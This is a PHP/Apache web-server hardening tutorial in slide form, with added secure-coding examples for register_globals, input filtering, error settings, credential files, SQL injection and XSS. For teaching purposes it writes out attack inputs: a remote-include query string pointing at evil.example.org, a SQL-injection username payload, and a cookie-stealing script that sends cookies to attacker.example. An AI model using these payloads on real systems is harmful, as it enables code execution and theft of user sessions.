Learn how to set up a secure personal web server using PHP and Apache on a Windows platform. This tutorial covers installation, hardening, and security measures to protect against common vulnerabilities.
Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache Created By: John Gibbons November 27th, 2007
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
Overview • PHP • Terminology • Vulnerabilities • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking
Overview • Installing a Personal Web Server • XAMPP • Installation • Hardening Security • Updates
Overview • Review • Conclusion • Sources • Questions
Background • Apache and PHP are free, open-source tools for building and serving web sites • Apache • In development since 1995 • Software that lets a computer act as a web (HTTP) server • PHP • Server-side, HTML-embedded scripting language • Runs on the server to generate dynamic web pages
NMAP • Open-source network scanner commonly used by attackers (and by defenders auditing their own hosts) • Host Discovery • Identifying which computers on a network are up • Port Scanning • Enumerating the open ports on one or more target computers
NMAP • Version Detection (-sV) • Interrogating the services listening on remote computers to determine the application name and version number • OS Detection (-O) • Remotely determining the operating system and some hardware characteristics of network devices • Defender's check: an Nmap scan of your own server shows exactly what an attacker will see, so anything you do not mean to serve should not be listening at all
Intellitamper • Once a web server has been found, a site mapper such as IntelliTamper spiders it and maps its directory structure • Attackers can then see directories and unlinked files they were not meant to see, such as an include directory holding database credentials • Countermeasure: disable directory listings (Options -Indexes in Apache) and keep non-public files outside the document root
PHP Terminology • Public scripts: scripts reachable directly via a URL • White list: treating input as invalid until it has been proven valid (the opposite of a black list, which only rejects known-bad input) • Data filtering: examining data from an external source (request, cookie, file, database) to ensure it meets the criteria to be considered valid
PHP Security • Data Filtering • Initialize all variables • Filter all data that comes from an external source • Develop with error_reporting set to E_ALL, so that the use of an uninitialized variable is not overlooked: a reference to an undefined variable generates a notice, which helps enforce initialization • Consider all data invalid until it is proven valid
PHP Security • Data Filtering Guidelines • Ensure that data filtering cannot be bypassed (every entry point runs through it) • Ensure that invalid data cannot be mistaken for valid data (keep filtered values in a separate array) • Identify the origin of the data (request, cookie, session, database) and treat anything external as untrusted
PHP Security • Register Globals • Disabled by default since PHP 4.2.0 (and removed entirely in PHP 5.4) • When enabled, every client-submitted value (GET, POST, cookie) is injected into the global namespace as a variable, so any variable the script fails to initialize can be set by the request
PHP Security • Register Globals Example

```php
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {
    include '/highly/sensitive/data.php';
}
```

• With register_globals on, this page can be requested with ?authorized=1 in the query string: $authorized is already true when the script starts, and the intended access control is bypassed
PHP Security • Register Globals Example

```php
include "$path/script.php";
```

• This page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string, which makes the statement equivalent to:

```php
include 'http://evil.example.org/?/script.php';
```

• If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this includes the output of http://evil.example.org/ just as if it were a local file, i.e. remote code execution • Since PHP 5.2 a separate allow_url_include setting (off by default) controls URLs in include/require; leave it off, but the real fix is never building an include path from request data
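The two register_globals cases above beside their hardened forms, as an added example rather than code from the slides. authenticated_user() is assumed to exist (a placeholder based on the session is given so the script runs); the script directory and page names are assumptions.

```php
<?php
// Added example (not from the original slides). Placeholder for the slide's
// assumed authenticated_user(): treat a logged-in session as authenticated.
function authenticated_user() {
    return isset($_SESSION['user_id']);
}

// 1. Initialise before use. Even with register_globals on, an explicit
//    assignment at the top of the script overwrites whatever ?authorized=1 set.
$authorized = false;
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {
    include '/highly/sensitive/data.php';
}

// 2. Never build an include path from request data. Map a request parameter
//    onto a fixed list of local scripts (assumed paths) and fall back to a
//    default for anything else, so $path never reaches include.
$scripts = array(
    'home'    => '/srv/app/pages/home.php',
    'profile' => '/srv/app/pages/profile.php',
);
$page = 'home';
if (isset($_GET['page']) && is_string($_GET['page']) && isset($scripts[$_GET['page']])) {
    $page = $_GET['page'];
}
include $scripts[$page];

// Defence in depth: even if a path slips through, refuse remote includes.
ini_set('allow_url_include', '0');
```

The is_string() check matters: a request for ?page[]=x makes $_GET['page'] an array, and using an array as an array key is an error rather than a silent miss.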
PHP Data Filtering • The following validates an email address (an isset/is_string guard is added so a missing or array-valued field does not raise a notice or a preg_match warning):

```php
<?php
$clean = array();
$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
if (isset($_POST['email']) && is_string($_POST['email'])
        && preg_match($email_pattern, $_POST['email'])) {
    $clean['email'] = $_POST['email'];
}
?>
```
PHP Data Filtering • The following example ensures that $_POST['num'] is an integer (strict comparison is used: with ==, PHP compares two numeric strings numerically, so on PHP 7.1+ the input "1e3" would pass as equal to "1000"):

```php
<?php
$clean = array();
if (isset($_POST['num']) && is_string($_POST['num'])
        && $_POST['num'] === strval(intval($_POST['num']))) {
    $clean['num'] = $_POST['num'];
}
?>
```
PHP Naming Conventions • Take a white list approach • Use variable names that make validated data easy to recognise, e.g. the $clean array from the previous examples • Never work from $_GET and $_POST directly once filtering is done: values still in those arrays are not identifiable as valid, so copy what passes into $clean and use only that
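A small white-list filter that builds the $clean array the slides recommend, covering the email and integer checks from the previous two slides in one place. This is an added example, not code from the slides; filter_var() (PHP 5.2+) does the integer and e-mail validation, and the username alphabet and length policy are assumptions.

```php
<?php
// Added example (not from the original slides): validated request data goes
// into $clean; anything that fails the white list is simply absent from it.
function filter_request(array $post) {
    $clean = array();

    // Integer: FILTER_VALIDATE_INT rejects "1e3", " 42", "42abc" and arrays,
    // and returns false (not 0) on failure, so the test must be !== false.
    if (isset($post['num'])) {
        $num = filter_var($post['num'], FILTER_VALIDATE_INT);
        if ($num !== false) {
            $clean['num'] = $num;
        }
    }

    if (isset($post['email'])) {
        $email = filter_var($post['email'], FILTER_VALIDATE_EMAIL);
        if ($email !== false) {
            $clean['email'] = $email;
        }
    }

    // Username: explicit allowed alphabet and length (assumed policy).
    if (isset($post['username']) && is_string($post['username'])
            && preg_match('/^[a-z0-9_]{3,20}$/i', $post['username'])) {
        $clean['username'] = $post['username'];
    }

    return $clean;
}

// Constructed input: one valid field, one non-integer that a loose == check
// would accept, and the SQL-injection payload used later in these slides.
$post = array(
    'num'      => '1e3',
    'email'    => 'user@example.org',
    'username' => "bad_guy', 'mypass', ''), ('good_guy",
);
var_dump(filter_request($post));
```

Only the e-mail address survives: the username payload fails the white list before it ever reaches a query, which is the point of filtering at the boundary rather than escaping at each use.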
PHP Timing • Once a PHP script begins to run, the HTTP request has been received in full • The user no longer has the opportunity to send data • So a variable initialized at the top of the script cannot be overridden by the request afterwards, which makes initialization a very good practice
PHP Error Reporting • error_reporting • Sets the level of error reporting • Set to E_ALL for both development and production: error_reporting(E_ALL); • display_errors • Prints errors in the page output • Use during development • Disable in production: error messages leak file paths, SQL fragments and version numbers to potential attackers
PHP Error Reporting • log_errors • Should be turned on in production • Only induces a performance hit if there is a serious number of errors • error_log • Dictates the location of the error log • The web server user needs write privileges to this file; keep it outside the document root so the log itself is not served
PHP Error Reporting • As of PHP 5.0 there is E_STRICT • Not included in E_ALL until PHP 5.4 • Useful during development: it flags code that will not be forward compatible (deprecated functions get their own E_DEPRECATED level from PHP 5.3)
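The settings from the three error-reporting slides applied at the top of a front controller, with the weak production setting (display_errors on) beside the corrected one. This is an added example, not code from the slides; the APP_ENV environment variable and the log path are assumptions.

```php
<?php
// Added example (not from the original slides): one switch between
// development and production for the PHP error-reporting settings.
$production = (getenv('APP_ENV') === 'production');   // assumed environment flag

// Both environments: report everything so uninitialized variables are noticed.
error_reporting(E_ALL);

// Weak: display_errors=1 in production shows paths and queries to attackers.
// Corrected: display only in development, log everywhere.
ini_set('display_errors', $production ? '0' : '1');
ini_set('log_errors', '1');

// Assumed log location: outside the document root, writable by the web server user.
ini_set('error_log', '/var/log/php/app.log');

// Before PHP 5.4, E_ALL did not include E_STRICT; add it by hand during development.
if (!$production && version_compare(PHP_VERSION, '5.4.0', '<')) {
    error_reporting(E_ALL | E_STRICT);
}
```

Checking the result is one request away: in production, trigger a notice on purpose and confirm it appears in the log file and not in the page body.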
SQL: Exposed Access Credentials • Many PHP applications interact with a database • The credentials used for authentication are often stored in a plain-text file:

```php
<?php
// Credentials file as on the slide; mysql_* is the old extension
// (removed in PHP 7), but the exposure problem is the same with PDO or mysqli.
$host = 'example.org';
$username = 'myuser';
$password = 'mypass';
$db = mysql_connect($host, $username, $password);
?>
```
SQL: Exposed Access Credentials • The previous example would be stored in a file called "db.inc" • This file is included whenever database access is needed • This approach offers convenience by keeping all credentials in a single file
SQL: Exposed Access Credentials • Problems arise when a document containing credentials is stored somewhere within the document root • Every document within the document root has a URL associated with it • Even if the document is never publicly linked, it is still accessible to an attacker who guesses or discovers the path (see IntelliTamper) • Worse, Apache does not normally hand a .inc file to PHP, so it is served as plain text and the credentials are displayed verbatim
SQL: Exposed Access Credentials • A simple solution is to place this file, and all modules, outside of the document root • Both include and require accept file system paths, so nothing forces modules to live under the document root
SQL: Exposed Access Credentials • Another solution is to place the following in the "httpd.conf" file (this file is only used with Apache):

```apache
<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>
```

• This is Apache 2.2 access-control syntax; Apache 2.4 only honours it when mod_access_compat is loaded • It also protects only files whose names end in .inc, so it is a backstop for the first solution, not a replacement
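The same rule written for both Apache generations, as an added example rather than configuration from the slides (the FilesMatch form is equivalent to the slide's `<Files ~ ...>`):

```apache
# Apache 2.2 (mod_authz_host): refuse to serve any file ending in .inc
<FilesMatch "\.inc$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Apache 2.4 (mod_authz_core): the same rule in the native 2.4 syntax
<FilesMatch "\.inc$">
    Require all denied
</FilesMatch>
```

After restarting Apache, request any .inc path directly and expect a 403. Renaming the file to db.inc.php would make PHP execute it instead of serving it raw, which hides the credentials only because the script produces no output; moving the file outside the document root remains the stronger control.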
SQL Injection • The result of data not being filtered • Example ($reg_password is generated by the application; the two $_POST values go into the query unfiltered):

```php
<?php
$sql = "INSERT INTO users (reg_username, reg_password, reg_email)
        VALUES ('{$_POST['reg_username']}', '$reg_password', '{$_POST['reg_email']}')";
?>
```
SQL Injection • This simple example lets the user supply a user name, password and email address in order to create an account • However, without data filtering, an attacker could enter the following into the user name field: bad_guy', 'mypass', ''), ('good_guy
SQL Injection • Assume the attacker gives a valid email address and the application generates the password "1234" • The SQL statement becomes:

```php
$sql = "INSERT INTO users (reg_username, reg_password, reg_email)
        VALUES ('bad_guy', 'mypass', ''), ('good_guy', '1234', 'shiflett@php.net')";
```
SQL Injection • The attacker has successfully created two accounts, and was able to supply all the information for the “bad guy” account. • The automatically generated password was bypassed
SQL Injection: Protection • Filter your data • Escape your data: valid input may still contain characters that interfere with SQL formatting • Use the escaping function native to your database driver, i.e. mysql_real_escape_string() (not mysql_escape_string(), which ignores the connection character set and has been deprecated since PHP 4.3) • Better still, use prepared statements (PDO or mysqli), which send the query structure and the data separately so escaping mistakes cannot happen
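The vulnerable INSERT from the preceding slides beside a hardened version that uses a PDO prepared statement, run against the slide's own payload. This is an added example, not code from the slides; it uses an in-memory SQLite database so it runs stand-alone, and the table layout is assumed.

```php
<?php
// Added example (not from the original slides). In-memory SQLite stands in
// for the MySQL database; the users table is assumed from the slide's INSERT.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (reg_username TEXT, reg_password TEXT, reg_email TEXT)');

// Constructed attacker input: the user name payload from the slide.
$post = array(
    'reg_username' => "bad_guy', 'mypass', ''), ('good_guy",
    'reg_email'    => 'victim@example.org',
);
$reg_password = '1234';   // the application-generated password

function count_users(PDO $db) {
    return (int) $db->query('SELECT COUNT(*) FROM users')->fetchColumn();
}

// Vulnerable: unfiltered request data is interpolated into the statement, so
// the payload turns one VALUES tuple into two and the attacker picks bad_guy's
// password instead of the generated one.
$sql = "INSERT INTO users (reg_username, reg_password, reg_email)
        VALUES ('{$post['reg_username']}', '$reg_password', '{$post['reg_email']}')";
$db->exec($sql);
echo "rows after vulnerable insert: " . count_users($db) . "\n";

$db->exec('DELETE FROM users');

// Hardened: a prepared statement ships the SQL and the values separately, so
// the quotes in the user name are stored as data and never parsed as SQL.
// (A real application would store password_hash($reg_password, PASSWORD_DEFAULT).)
$stmt = $db->prepare('INSERT INTO users (reg_username, reg_password, reg_email)
                      VALUES (:u, :p, :e)');
$stmt->execute(array(
    ':u' => $post['reg_username'],
    ':p' => $reg_password,
    ':e' => $post['reg_email'],
));
echo "rows after prepared insert: " . count_users($db) . "\n";

// The stored user name is the attacker's string verbatim, quotes and all.
$row = $db->query('SELECT reg_username FROM users')->fetch(PDO::FETCH_ASSOC);
var_dump($row['reg_username'] === $post['reg_username']);
```

Run it and compare the two row counts: the vulnerable path creates the extra bad_guy account, the prepared path creates exactly one row whose user name is the whole payload. Filtering (rejecting the quote-laden user name up front) and prepared statements are complementary; the prepared statement is what makes the query safe even when filtering lets something through.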
Cross Site Scripting (XSS) • Exploits the trust a user has for a particular site • Users do not necessarily have a high level of trust for any web site, but the browser does: when the browser sends cookies in a request, it is trusting the web site • Users may also have different browsing habits, or different security levels configured in their browser, depending on which site they are visiting
Cross Site Scripting (XSS) • Generally involves web sites that display external data without encoding it for the page • Applications at heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds)
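External data such as a forum comment rendered raw beside the same data encoded for an HTML context, with the cookie-stealing payload the slide deck refers to as the input. This is an added example, not code from the slides; the attacker host name and the comment are constructed.

```php
<?php
// Added example (not from the original slides): rendering a user-supplied
// comment into an HTML page body.

// Vulnerable: the raw string is part of the markup, so a <script> tag in it
// runs in the visitor's browser with that visitor's cookies available.
function render_raw($comment) {
    return "<p>$comment</p>";
}

// Hardened: encode for the HTML body context. ENT_QUOTES also encodes quotes so
// the same function is safe inside quoted attribute values; naming the charset
// stops invalid multibyte sequences from smuggling a < past the encoder.
function render_safe($comment) {
    return '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed cookie-stealing payload (attacker.example is a placeholder).
$comment = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo render_raw($comment), "\n";
echo render_safe($comment), "\n";

// Defence in depth for the cookie-theft case: an HttpOnly session cookie is
// not readable from document.cookie at all (setting available since PHP 5.2,
// to be applied before session_start()).
ini_set('session.cookie_httponly', '1');
```

htmlspecialchars() is the right encoder only for HTML body and attribute contexts; data placed inside a JavaScript string or a URL needs the encoding of that context instead. The HttpOnly flag limits the damage of a missed encoding but does not stop the script from acting on the victim's behalf, so it complements output encoding rather than replacing it.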